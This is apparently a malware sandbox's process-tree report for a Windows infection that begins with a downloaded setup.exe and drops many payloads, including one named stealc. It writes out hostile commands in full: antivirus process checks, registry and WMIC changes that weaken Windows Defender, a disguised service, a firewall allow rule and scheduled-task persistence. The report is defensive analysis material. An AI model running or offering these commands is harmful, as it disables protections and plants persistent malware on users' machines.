    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2252,1022681073520156381,13933789847219908894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2276 /prefetch:2
    3⤵
    PID:2316
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2252,1022681073520156381,13933789847219908894,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1420
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2252,1022681073520156381,13933789847219908894,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
    3⤵
    PID:1660
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,1022681073520156381,13933789847219908894,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
    3⤵
    PID:1960
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,1022681073520156381,13933789847219908894,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
    3⤵
    PID:4556
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2252,1022681073520156381,13933789847219908894,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8
    3⤵
    PID:336
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2252,1022681073520156381,13933789847219908894,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2072
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,1022681073520156381,13933789847219908894,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
    3⤵
    PID:4048
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,1022681073520156381,13933789847219908894,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
    3⤵
    PID:2092
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2252,1022681073520156381,13933789847219908894,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3520 /prefetch:8
    3⤵
    PID:432
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,1022681073520156381,13933789847219908894,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
    3⤵
    PID:216
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,1022681073520156381,13933789847219908894,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
    3⤵
    PID:4916
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,1022681073520156381,13933789847219908894,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1
    3⤵
    PID:2692
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2252,1022681073520156381,13933789847219908894,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4000 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1652
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,1022681073520156381,13933789847219908894,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
    3⤵
    PID:4300
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,1022681073520156381,13933789847219908894,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:1
    3⤵
    PID:3740
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap6359:86:7zEvent31617
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4812
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap20837:74:7zEvent22632
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4200
- C:\Users\Admin\Downloads\setup.exe
  "C:\Users\Admin\Downloads\setup.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:3876
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k move Tape Tape.cmd & Tape.cmd & exit
    3⤵
    PID:3504
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4184
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      4⤵
      PID:4036
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1972
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
      4⤵
      PID:4536
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 324267
      4⤵
      System Location Discovery: System Language Discovery
      PID:3420
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V "OCTLOADEDLNAV" Scout
      4⤵
      PID:4444
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b American + Ears + Probe + Banks + Korea + Furnishings + Pursuit + Jpeg + Exclusion + Identifier + School + Quotes + Bulgarian + Patents + Political + Networks + Bio + Prevent + Finance + Sm + Retired 324267\s
      4⤵
      PID:3684
  - - C:\Users\Admin\AppData\Local\Temp\324267\Foot.pif
      Foot.pif s
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:1408
  - - C:\Windows\SysWOW64\choice.exe
      choice /d y /t 5
      4⤵
      PID:3172
- C:\Users\Admin\AppData\Local\Temp\324267\Foot.pif
  C:\Users\Admin\AppData\Local\Temp\324267\Foot.pif
  2⤵
  - Modifies firewall policy service
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:220
- - C:\Users\Admin\Documents\piratemamm\5cL0hbP2BlOOlA3K24bN_Kgl.exe
    C:\Users\Admin\Documents\piratemamm\5cL0hbP2BlOOlA3K24bN_Kgl.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    PID:3996
  - - C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
      "C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:1808
- - C:\Users\Admin\Documents\piratemamm\3NcWoIwM1AbzK3IQPHPOLtww.exe
    C:\Users\Admin\Documents\piratemamm\3NcWoIwM1AbzK3IQPHPOLtww.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:4960
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2540
- - C:\Users\Admin\Documents\piratemamm\shYdB1lAKdOjVl1A3sVBsMCM.exe
    C:\Users\Admin\Documents\piratemamm\shYdB1lAKdOjVl1A3sVBsMCM.exe
    3⤵
    - Executes dropped EXE
    PID:2060
  - - C:\Users\Admin\AppData\Local\Temp\is-CASTP.tmp\shYdB1lAKdOjVl1A3sVBsMCM.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-CASTP.tmp\shYdB1lAKdOjVl1A3sVBsMCM.tmp" /SL5="$100042,4431402,54272,C:\Users\Admin\Documents\piratemamm\shYdB1lAKdOjVl1A3sVBsMCM.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      PID:2640
    - - C:\Users\Admin\AppData\Local\GenYo Vocal Remover\genyovocalremover32_64.exe
        
        "C:\Users\Admin\AppData\Local\GenYo Vocal Remover\genyovocalremover32_64.exe" -i
        5⤵
        Executes dropped EXE
        
        PID:4928
    - - C:\Users\Admin\AppData\Local\GenYo Vocal Remover\genyovocalremover32_64.exe
        
        "C:\Users\Admin\AppData\Local\GenYo Vocal Remover\genyovocalremover32_64.exe" -s
        5⤵
        Executes dropped EXE
        
        PID:2156
- - C:\Users\Admin\Documents\piratemamm\6WkPkBp_qxEUAf7fdQsFQqRE.exe
    C:\Users\Admin\Documents\piratemamm\6WkPkBp_qxEUAf7fdQsFQqRE.exe
    3⤵
    - Executes dropped EXE
    PID:4944
  - - C:\Users\Admin\AppData\Local\Temp\7zSEF4E.tmp\Install.exe
      .\Install.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3184
    - - C:\Users\Admin\AppData\Local\Temp\7zSF569.tmp\Install.exe
        
        .\Install.exe /xPdidoJo "525403" /S
        5⤵
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:4220
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2160
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        7⤵
        Indirect Command Execution
        
        PID:1412
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:2732
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4680
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        7⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:4232
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5012
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        9⤵
        
        PID:1220
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        7⤵
        Indirect Command Execution
        
        PID:1692
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        
        PID:888
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        9⤵
        
        PID:1500
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        7⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:528
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        
        PID:3592
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4508
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        7⤵
        Indirect Command Execution
        
        PID:2296
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        
        PID:4928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:424
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        10⤵
        
        PID:4832
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        6⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:1416
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        
        PID:3484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4204
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2248
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bJkMQFwoGoPsGTRxOv" /SC once /ST 02:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSF569.tmp\Install.exe\" yI /qOdidWgX 525403 /S" /V1 /F
        6⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:448
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4680
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 964
        6⤵
        Program crash
        
        PID:5280
- - C:\Users\Admin\Documents\piratemamm\D_IyF2JVTdF3h_AcBm4TwEC1.exe
    C:\Users\Admin\Documents\piratemamm\D_IyF2JVTdF3h_AcBm4TwEC1.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:5096
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ugjsekhr\
      4⤵
      PID:4356
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\htfkhnma.exe" C:\Windows\SysWOW64\ugjsekhr\
      4⤵
      System Location Discovery: System Language Discovery
      PID:4000
  - - C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" create ugjsekhr binPath= "C:\Windows\SysWOW64\ugjsekhr\htfkhnma.exe /d\"C:\Users\Admin\Documents\piratemamm\D_IyF2JVTdF3h_AcBm4TwEC1.exe\"" type= own start= auto DisplayName= "wifi support"
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:3080
  - - C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" description ugjsekhr "wifi internet conection"
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:4520
  - - C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" start ugjsekhr
      4⤵
      Launches sc.exe
      PID:3348
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:3820
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5096 -s 888
      4⤵
      Program crash
      PID:4972
- - C:\Users\Admin\Documents\piratemamm\w74QkkuBF85hmDyo3WP13d2g.exe
    C:\Users\Admin\Documents\piratemamm\w74QkkuBF85hmDyo3WP13d2g.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    PID:3780
  - - C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
      "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:4656
    - - C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:1928
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4784
    - - C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3708
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Checks computer location settings
        
        PID:1988
        
        C:\Users\Admin\AppData\Roaming\9d0Y7MxBU5.exe
        
        "C:\Users\Admin\AppData\Roaming\9d0Y7MxBU5.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2096
        
        C:\Users\Admin\AppData\Roaming\LS6xXLfIqH.exe
        
        "C:\Users\Admin\AppData\Roaming\LS6xXLfIqH.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4540
    - - C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:524
      - C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe"
        6⤵
        Executes dropped EXE
        
        PID:3572
    - - C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe"
        5⤵
        Executes dropped EXE
        
        PID:1228
    - - C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe"
        5⤵
        Executes dropped EXE
        Checks processor information in registry
        
        PID:944
    - - C:\Users\Admin\AppData\Local\Temp\1000069001\FILE2233.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000069001\FILE2233.exe"
        5⤵
        Executes dropped EXE
        
        PID:3264
    - - C:\Users\Admin\AppData\Local\Temp\1000090001\MYNEWRDX.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000090001\MYNEWRDX.exe"
        5⤵
        Executes dropped EXE
        
        PID:3740
- - C:\Users\Admin\Documents\piratemamm\JYqzDWcCifBR2B3OjSuXyEcL.exe
    C:\Users\Admin\Documents\piratemamm\JYqzDWcCifBR2B3OjSuXyEcL.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:4824
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:3412
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf LG" /sc ONLOGON /rl HIGHEST
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:2288
- C:\Users\Admin\Downloads\setup.exe
  "C:\Users\Admin\Downloads\setup.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:5060
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k move Tape Tape.cmd & Tape.cmd & exit
    3⤵
    PID:4652
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4920
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      4⤵
      PID:3996
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3104
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
      4⤵
      PID:224
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 324267
      4⤵
      System Location Discovery: System Language Discovery
      PID:4312
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b American + Ears + Probe + Banks + Korea + Furnishings + Pursuit + Jpeg + Exclusion + Identifier + School + Quotes + Bulgarian + Patents + Political + Networks + Bio + Prevent + Finance + Sm + Retired 324267\s
      4⤵
      PID:1324
  - - C:\Users\Admin\AppData\Local\Temp\324267\Foot.pif
      Foot.pif s
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:4460
  - - C:\Windows\SysWOW64\choice.exe
      choice /d y /t 5
      4⤵
      PID:2456
- C:\Users\Admin\AppData\Local\Temp\324267\Foot.pif
  C:\Users\Admin\AppData\Local\Temp\324267\Foot.pif
  2⤵
  - Executes dropped EXE
  PID:2500
- C:\Users\Admin\Downloads\setup.exe
  "C:\Users\Admin\Downloads\setup.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:3892
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k move Tape Tape.cmd & Tape.cmd & exit
    3⤵
    PID:2024
